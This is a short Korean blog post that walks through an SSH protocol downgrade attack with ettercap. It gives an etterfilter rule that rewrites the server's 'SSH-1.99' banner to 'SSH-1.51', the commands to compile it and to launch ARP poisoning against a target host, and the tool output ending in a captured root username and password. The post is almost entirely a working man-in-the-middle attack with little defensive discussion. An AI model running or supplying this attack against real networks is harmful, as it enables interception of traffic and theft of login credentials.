'ettercat'에 해당되는 글 1건

  1. 2011.01.21 ssh mith with ettercat
내용
- 서버와 클라이언트 통신 시 ssh 프로토콜 버전 협상이 발생
(Default : SSH-1.99 >> 2버전)
- MITM을 통해 취약한 버전의 SSH 통신토록 설정

SSH v1 VS SSH v2

더보기



0x01. 필터링 규칙 생성
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
    replace("SSH-1.99","SSH-1.51");
}
 
# etterfilter -o ssh_rb.ef2 ssh_rb.ef

0x02. MITM 시도
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //

더보기


ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)

  eth0 ->    00:0C:29:BF:9E:AC        10.0.0.134     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

SSH : 10.0.0.130:22 -> USER: root  PASS: asdfasdf



참고
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter


저작자 표시
신고
Posted by 김주일

티스토리 툴바